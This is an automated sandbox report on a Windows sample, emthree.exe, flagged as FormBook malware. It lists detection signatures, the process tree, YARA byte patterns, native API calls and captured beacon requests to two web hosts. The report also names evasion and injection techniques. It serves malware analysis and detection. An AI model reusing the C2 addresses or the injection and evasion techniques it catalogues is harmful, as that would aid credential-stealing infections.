Analysis Report emthree.exe

Overview

General Information

Sample Name: emthree.exe
Analysis ID: 323574
MD5: 25b5788669a3a8f35596ce975f0823a7
SHA1: 77e07883f131f342e3d24954ea348d25554440a1
SHA256: f3024d8a77f7d80b8e1f44a868913ad76e926d5add36cdc27332c42c3cc012a3
Tags: PEP

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • emthree.exe (PID: 4600 cmdline: 'C:\Users\user\Desktop\emthree.exe' MD5: 25B5788669A3A8F35596CE975F0823A7)
    • emthree.exe (PID: 5772 cmdline: {path} MD5: 25B5788669A3A8F35596CE975F0823A7)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6240 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6256 cmdline: /c del 'C:\Users\user\Desktop\emthree.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      1.2.emthree.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        1.2.emthree.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a707:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b70a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.emthree.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17629:$sqlite3step: 68 34 1C 7B E1
        • 0x1773c:$sqlite3step: 68 34 1C 7B E1
        • 0x17658:$sqlite3text: 68 38 2A 90 C5
        • 0x1777d:$sqlite3text: 68 38 2A 90 C5
        • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
        1.2.emthree.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          1.2.emthree.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Antivirus / Scanner detection for submitted sample
          Source: emthree.exe, Avira: detected
          Multi AV Scanner detection for submitted file
          Source: emthree.exe, Metadefender: Detection: 35%
          Source: emthree.exe, ReversingLabs: Detection: 64%
          Yara detected FormBook
          Source: Yara match, File source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sample
          Source: emthree.exe, Joe Sandbox ML: detected
          Source: 1.2.emthree.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: global traffic, HTTP traffic detected:
            GET /unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q HTTP/1.1
            Host: www.porncamslivechat.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: global traffic, HTTP traffic detected:
            GET /unx5/?YBZpk4k0=1w0hMOl97180k8Du4bGC2gk65X6wFt6LICq9bRyB5mmRHYVxdYOusOKtXf2j62HHiftJ&Wt=LhnLHro0q HTTP/1.1
            Host: www.amarilloautoexpress.com
            Connection: close
            Data Raw: 00 00 00 00 00 00 00
            Data Ascii:
          Source: Joe Sandbox View, ASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: Joe Sandbox View, ASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
          Source: C:\Windows\explorer.exe, Code function: 2_2_06D527A2 getaddrinfo,setsockopt,recv,2_2_06D527A2
          Source: unknown, DNS traffic detected: queries for: www.asojebu.com
          Source: global traffic, HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Fri, 27 Nov 2020 05:37:46 GMT
            Server: Apache
            Link: <https://porncamslivechat.com/wp-json/>; rel="https://api.w.org/"
            Expires: Thu, 19 Nov 1981 08:52:00 GMT
            Cache-Control: no-store, no-cache, must-revalidate
            Pragma: no-cache
            Set-Cookie: PHPSESSID=1d6c5c8d17388afcc8a5932da9c3f004; path=/
            Upgrade: h2,h2c
            Connection: Upgrade, close
            Referrer-Policy: no-referrer-when-downgrade
            Transfer-Encoding: chunked
            Content-Type: text/html; charset=UTF-8
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
          Source: emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmp, String found in binary or memory: http://www.fontbureau.comm
          Source: emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmp, String found in binary or memory: http://www.fontbureau.comu
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
          Source: emthree.exe, 00000000.00000002.238716419.00000000016B0000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_0041A070 NtClose,1_2_0041A070
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_0041A120 NtAllocateVirtualMemory,1_2_0041A120
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_00419F40 NtCreateFile,1_2_00419F40
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_00419FF0 NtReadFile,1_2_00419FF0
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_0041A06B NtClose,1_2_0041A06B
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_0041A03A NtReadFile,1_2_0041A03A
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01029910
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_010299A0 NtCreateSection,LdrInitializeThunk,1_2_010299A0
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029840 NtDelayExecution,LdrInitializeThunk,1_2_01029840
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029860 NtQuerySystemInformation,LdrInitializeThunk,1_2_01029860
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_010298F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_010298F0
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_01029A00
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029A20 NtResumeThread,LdrInitializeThunk,1_2_01029A20
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029A50 NtCreateFile,LdrInitializeThunk,1_2_01029A50
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029540 NtReadFile,LdrInitializeThunk,1_2_01029540
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_010295D0 NtClose,LdrInitializeThunk,1_2_010295D0
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029710 NtQueryInformationToken,LdrInitializeThunk,1_2_01029710
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029780 NtMapViewOfSection,LdrInitializeThunk,1_2_01029780
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_010297A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_010297A0
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_01029660
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_010296E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_010296E0
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029950 NtQueueApcThread,1_2_01029950
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_010299D0 NtCreateProcessEx,1_2_010299D0
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029820 NtEnumerateKey,1_2_01029820
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_0102B040 NtSuspendThread,1_2_0102B040
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_010298A0 NtWriteVirtualMemory,1_2_010298A0
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029B00 NtSetValueKey,1_2_01029B00
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_0102A3B0 NtGetContextThread,1_2_0102A3B0
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029A10 NtQuerySection,1_2_01029A10
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029A80 NtOpenDirectoryObject,1_2_01029A80
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029520 NtWaitForSingleObject,1_2_01029520
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_0102AD30 NtSetContextThread,1_2_0102AD30
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029560 NtWriteFile,1_2_01029560
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_010295F0 NtQueryInformationFile,1_2_010295F0
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_0102A710 NtOpenProcessToken,1_2_0102A710
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029730 NtQueryVirtualMemory,1_2_01029730
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029760 NtOpenProcess,1_2_01029760
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_0102A770 NtOpenThread,1_2_0102A770
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029770 NtSetInformationFile,1_2_01029770
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029FE0 NtCreateMutant,1_2_01029FE0
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029610 NtEnumerateValueKey,1_2_01029610
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029650 NtQueryValueKey,1_2_01029650
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_01029670 NtQueryInformationProcess,1_2_01029670
          Source: C:\Users\user\Desktop\emthree.exe, Code function: 1_2_010296D0 NtCreateKey,1_2_010296D0
          Source: C:\Windows\explorer.exe, Code function: 2_2_06D51A52 NtCreateFile,2_2_06D51A52
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE95D0 NtClose,LdrInitializeThunk,6_2_04EE95D0
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE9540 NtReadFile,LdrInitializeThunk,6_2_04EE9540
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE96E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04EE96E0
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE96D0 NtCreateKey,LdrInitializeThunk,6_2_04EE96D0
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE9660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04EE9660
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE9650 NtQueryValueKey,LdrInitializeThunk,6_2_04EE9650
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE9FE0 NtCreateMutant,LdrInitializeThunk,6_2_04EE9FE0
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE9780 NtMapViewOfSection,LdrInitializeThunk,6_2_04EE9780
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE9710 NtQueryInformationToken,LdrInitializeThunk,6_2_04EE9710
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE9860 NtQuerySystemInformation,LdrInitializeThunk,6_2_04EE9860
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE9840 NtDelayExecution,LdrInitializeThunk,6_2_04EE9840
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE99A0 NtCreateSection,LdrInitializeThunk,6_2_04EE99A0
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_04EE9910
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE9A50 NtCreateFile,LdrInitializeThunk,6_2_04EE9A50
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE95F0 NtQueryInformationFile,6_2_04EE95F0
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE9560 NtWriteFile,6_2_04EE9560
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE9520 NtWaitForSingleObject,6_2_04EE9520
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EEAD30 NtSetContextThread,6_2_04EEAD30
